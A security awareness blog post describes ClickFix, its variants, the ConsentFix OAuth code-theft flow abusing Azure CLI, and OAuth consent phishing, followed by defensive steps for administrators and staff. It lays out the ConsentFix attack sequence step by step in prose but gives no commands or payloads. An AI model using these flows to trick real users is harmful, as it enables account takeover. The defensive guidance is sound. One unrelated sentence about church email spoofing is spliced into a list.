ClickFix, ConsentFix, and OAuth Consent Phishing: The Attacks That Don't Need Your Password
Phishing has evolved. Attacks like ClickFix and ConsentFix don't need your password or MFA — they hijack trust in real Microsoft login screens. Here's how to protect your team.
Mission Guard Team
May 5, 20268 min read
Phishing has changed. The attacks hitting organizations right now don't look like the suspicious emails your team was trained to spot. They look like CAPTCHA verifications, browser prompts, and Microsoft login screens — because in many cases, they are the real thing.
This post breaks down three related attack techniques that are actively targeting small organizations, nonprofits, and businesses in 2025–2026. More importantly, it gives you concrete steps to protect your team today.
What Is ClickFix?
ClickFix is a social engineering technique where an attacker tricks you into running a malicious command on your own computer. Unlike traditional phishing, there's no malicious attachment to scan and no fake login page to detect. You do the attacker's work for them.
Here's how it typically plays out:
You land on a webpage — through a search result, a phishing email, or even a compromised legitimate site.
A fake error message, CAPTCHA challenge, or "verification" prompt appears.
The page instructs you to press a keyboard shortcut (like Windows+R or Ctrl+V), paste something into a dialog box, and hit Enter.
What you just pasted was a PowerShell or terminal command that downloads and runs malware.
The technique is devastatingly effective because it exploits human problem-solving instinct. When your browser shows an error or asks you to verify something, your natural reaction is to follow the fix. Security tools have a hard time stopping it because you are the one executing the command — no exploit or malicious download is involved from the software's perspective.
ClickFix activity surged over 500% in early 2025 and remains one of the most common attack vectors heading into 2026. Variants now include fake Windows Update screens, crashed browser windows with "recovery" instructions, and spoofed Microsoft Teams pages.
Newer Variants to Watch For
Attackers don't sit still. Several named evolutions of ClickFix have appeared recently:
CrashFix intentionally crashes your browser, then presents "fix" instructions that install a malicious browser extension.
Someone could send emails that appear to come from your pastor's real email address. Learn how SPF, DKIM, and DMARC protect your church from email impersonation.
FileFix uses Windows File Explorer instead of the command line, making the interaction feel even more routine.
DNS-based ClickFix hides its payloads in DNS responses — a channel most security tools don't inspect closely.
All of them share the same core trick: convince the user to execute something themselves.
What Is ConsentFix?
ConsentFix takes the ClickFix concept and applies it to Microsoft's OAuth authentication system. First documented by Push Security in late 2025 and now tracked through a third iteration (v3) as of May 2026, this attack is particularly dangerous because it bypasses passwords, MFA, and even phishing-resistant authentication like passkeys entirely.
Here's the attack flow:
A victim visits a compromised or malicious webpage (often found through a normal Google search).
A fake Cloudflare Turnstile (CAPTCHA) asks for an email address. This filters out researchers and non-corporate accounts.
After entering a work email, the page presents a "Sign In" button and a set of copy-paste instructions.
Clicking "Sign In" opens a legitimate Microsoft login page in a new tab. The victim logs in normally (or their existing session is used automatically).
After authentication, the browser redirects to a localhost URL that contains an OAuth authorization code.
The victim is instructed to copy that localhost URL and paste it back into the original page.
The attacker's server extracts the authorization code, exchanges it for access and refresh tokens, and now has persistent access to the victim's Microsoft 365 account.
The entire sequence takes under 30 seconds. The victim sees a "verification successful" message and goes about their day. Meanwhile, the attacker can now read email, access OneDrive files, browse Teams messages, and in some cases perform administrative actions — all without ever knowing the victim's password.
Why This Is So Hard to Block
ConsentFix specifically abuses Azure CLI, which is a first-party Microsoft application. First-party apps are implicitly trusted in every Microsoft tenant. They can't be blocked, deleted, or restricted through normal app consent policies. They don't require admin approval. This is by design — it's a core part of how Microsoft's identity platform works — and attackers are exploiting that architectural trust.
ConsentFix v3 adds automation on top. It uses services like Pipedream for webhook-based token exchange and Hunter.io for email validation, turning what was once a manual attack into something that scales.
OAuth Consent Phishing: The Bigger Picture
ConsentFix is part of a broader category called OAuth consent phishing — attacks that abuse the legitimate app permission system built into platforms like Microsoft 365, Google Workspace, and others.
In a standard consent phishing attack, the attacker registers a malicious application (which is free and takes minutes) and sends the victim a link. That link opens a real Microsoft (or Google) consent screen asking the victim to grant the app permissions like "Read your email" or "Access your files." Because the consent screen comes from Microsoft's own servers, it looks completely legitimate. Once the victim clicks "Accept," the app has ongoing access to their account — no password required.
This category of attack is significant because:
MFA doesn't help. The victim authenticates normally. The attack happens after authentication.
Password changes don't help. The attacker has an OAuth token, not a password. Changing the password doesn't revoke the token.
The consent screen is real. It's hosted by Microsoft. It's not a fake page. This makes it extremely difficult for users to distinguish from a legitimate app installation.
State-sponsored groups have been observed using these techniques since at least late 2024, with Russian-linked actors specifically targeting government, academic, and nonprofit organizations through device code phishing and OAuth abuse.
How to Protect Your Organization
For IT Administrators
Restrict app consent policies. In Microsoft Entra ID (formerly Azure AD), configure user consent settings so that users can only approve apps from verified publishers or apps requesting low-risk permissions. Better yet, require admin approval for all third-party app consent. Starting July 2025, Microsoft enabled a managed consent policy by default that blocks users from consenting to third-party apps accessing files and sites — verify this is active in your tenant.
Audit existing OAuth app grants. Review which applications have been granted consent in your tenant. Look for apps with broad permissions (Mail.Read, Files.ReadWrite, etc.) that you don't recognize. Revoke anything suspicious immediately.
Monitor for Azure CLI anomalies. If your organization doesn't use Azure CLI, any sign-in events for that application should be treated as suspicious. In Entra ID audit logs, watch for Azure CLI authentication from unexpected locations or IP ranges.
Apply Conditional Access policies. Restrict sign-ins based on device compliance, location, and application. Be cautious about exempting Azure CLI or other developer tools from these policies — those exemptions are exactly what ConsentFix exploits.
Restrict PowerShell and terminal execution. For non-technical staff, consider policies that limit the ability to run PowerShell scripts or commands from untrusted sources. Windows AppLocker or WDAC (Windows Defender Application Control) can help.
Deploy endpoint detection. An EDR solution that monitors for unusual PowerShell activity, unexpected process chains, and suspicious clipboard behavior can catch ClickFix attacks even after a user executes the command.
For End Users and Staff Training
No legitimate service will ever ask you to copy-paste a URL, code, or command into a dialog box, terminal, or browser field as a "verification" step. This is the single most important thing your team needs to understand. If a website asks you to open a Run dialog, paste something into PowerShell, or copy a URL from your address bar into another page — stop. Close the tab. Report it.
Be skeptical of CAPTCHA or verification pages that ask for your email address. Real CAPTCHAs (Cloudflare Turnstile, Google reCAPTCHA) never ask for an email. If one does, it's a filter designed to target you specifically.
Review app permission requests carefully. If a Microsoft or Google popup asks you to grant an application access to your email, files, or account, pause and ask: Did I initiate this? Do I recognize this application? If not, deny it and report it to your IT team.
A legitimate "fix" for a browser problem will never come from the webpage itself. If a page claims your browser is broken and offers step-by-step instructions, that's the attack. Close the tab and open your browser's actual settings or help menu instead.
Watch for localhost URLs. If your browser redirects to a URL starting with http://localhost during what seemed like a normal login flow, something unusual is happening. Don't copy that URL anywhere. Close the tab.
The Bottom Line
These attacks succeed because they hijack trust — trust in Microsoft's real login screens, trust in familiar CAPTCHA prompts, and trust in the instinct to "fix" something that looks broken. They don't need your password. They don't need to beat your MFA. They just need one click-and-paste from someone having a busy day.
The best defense is a team that knows what to look for and an environment configured to limit what damage can be done when someone inevitably slips. No organization is too small to be targeted — in fact, smaller teams with fewer security layers are often the most attractive targets.
